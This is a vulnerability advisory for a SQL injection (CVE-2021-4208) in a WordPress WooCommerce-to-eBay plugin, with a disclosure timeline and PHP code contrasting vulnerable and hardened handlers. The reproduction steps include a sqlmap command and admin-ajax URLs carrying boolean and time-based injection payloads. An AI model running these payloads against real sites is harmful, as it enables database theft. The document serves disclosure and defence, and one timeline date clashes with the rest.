CVE-2021-4208 SQL Injection vulnerability in 'ExportFeed: List WooCommerce Products on eBay Store' plugin

CVE-2021-4208

CVSS: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

https://wordpress.org/plugins/exportfeed-list-woocommerce-products-on-ebay-store/#description

https://wpscan.com/vulnerability/0cf63b44-f709-4ba4-be14-1eea934c2007

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4208

Disclosure Timeline

Nov 21, 2021: Issue Identified and Disclosed to WP plugin team

Nov 22, 2021: Got auto reply and Plugin Closed

December 27, 2021: Submitted to Mitre for cve

January 20, 2022: Got reply from Mitre saying to ping Wpscan, pinged Wpscan

January 21, 2021: CVE Assigned CVE-2021-4208

February 21, 2022: CVE Published in NVD

February 28, 2022: CVE updated with score

Description:

The ExportFeed: List WooCommerce Products on eBay Store plugin 2.0.1.0 uses a `product_id` POST parameter which is not properly sanitized for use in an SQL statement, leading to a SQL injection vulnerability.

SQL injection vulnerability in fetch_product_ajax.php in Exportfeed List WooCommerce Products on eBay Store Wordpress plugin 1.1.0 through 2.0.1.0 allows authenticated attackers to execute arbitrary SQL commands via the product_id POST parameter.

We can see the problematic code in fetch_product_ajax.php.

This vulnerability is present in the current version of the plugin 2.0.1.0 and appears to also be present back to version 1.1.0. Administrative access is required to access the vulnerable functionality.
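The advisory does not reproduce the plugin's source, so the following is an added illustration (not the plugin's own code): a hypothetical AJAX handler that concatenates the `product_id` POST value straight into a query, next to the same handler hardened with the WordPress APIs a plugin author would normally use. Function names and the query are assumptions; `$wpdb`, `absint()`, `check_ajax_referer()` and `current_user_can()` are standard WordPress.

```php
<?php
// Added illustration, not the plugin's actual source.
// Assumes the global $wpdb object and the standard posts table.

// Hypothetical vulnerable pattern: product_id is interpolated verbatim, so
// any SQL expression supplied in the POST body becomes part of the WHERE clause
// (this is the shape of defect the advisory describes, not the plugin's code).
function fetch_product_unsafe( $wpdb ) {
    $product_id = $_POST['product_id'];
    $sql = "SELECT ID, post_title FROM {$wpdb->posts}"
         . " WHERE ID = " . $product_id . " AND post_type = 'product'";
    return $wpdb->get_row( $sql );
}

// Hardened form of the same handler.
function fetch_product_safe( $wpdb ) {
    // Keep the admin-only boundary explicit: nonce and capability checks first.
    // Nonce action/query-arg names are assumptions for this example.
    check_ajax_referer( 'example_fetch_product', 'security' );
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 1. Coerce the untrusted value to a non-negative integer before it is used.
    //    "1 AND 1=1" becomes 1; anything non-numeric becomes 0 and is rejected.
    $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;
    if ( 0 === $product_id ) {
        wp_send_json_error( 'invalid product_id', 400 );
    }

    // 2. Bind the value anyway: %d makes it a typed placeholder, so the query
    //    text never depends on request data even if step 1 is later changed.
    $sql = $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE ID = %d AND post_type = 'product'",
        $product_id
    );
    return $wpdb->get_row( $sql );
}
```

Both the integer coercion and `$wpdb->prepare()` are needed: the first rejects malformed input early, the second guarantees the statement structure cannot be altered by the parameter.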

Link to plugin:

https://wordpress.org/plugins/exportfeed-list-woocommerce-products-on-ebay-store/#description

Steps to reproduce:

  1. Log into WordPress as the admin user
  2. Install WooCommerce and 'ExportFeed: List WooCommerce Products on eBay Store' plugins
  3. Perform initial config for the WooCommerce plugin and create a product
  4. Perform initial config for the ExportFeed plugin and create an eBay Connect (Create Feed will not work without this)
  5. In the ExportFeed plugin settings go to Create Feed and click Custom Product Feed, search for a product and capture the request with an intercepting proxy.
  6. Modify the original request parameters so we hit the appropriate functionality

Original request:

Modified request:

&q=savep&local_cat_ids=1&product_id=1

  7. Save the request to a file, post.txt
  8. Run sqlmap to pull the current user

sqlmap -r post.txt --dbms=mysql --current-user --keep-alive --level=3 --risk=3 -p product_id --threads=5 --flush-session

https://test0.local/wp-admin/admin-ajax.php?action=gcpf_cart_product&feedpath=core/ajax/Wp/fetch_product_ajax.php&action=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=&sku=snake&merchat_type=eBaySeller&service_name=eBaySeller&showOutofStock=1&limit=0,10&q=savep&local_cat_ids=1&product_id=1 AND 3082=3082

https://test0.local/wp-admin/admin-ajax.php?action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&action=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=&sku=snake&merchat_type=eBaySeller&service_name=eBaySeller&showOutofStock=1&limit=0,10&q=savep&local_cat_ids=1&product_id=1 AND (SELECT 9979 FROM (SELECT(SLEEP(5)))Ing)

Using this technique, we can also (slowly) dump the entire contents of the database, including the key for the eBay connection this plugin uses, WordPress users, and so on.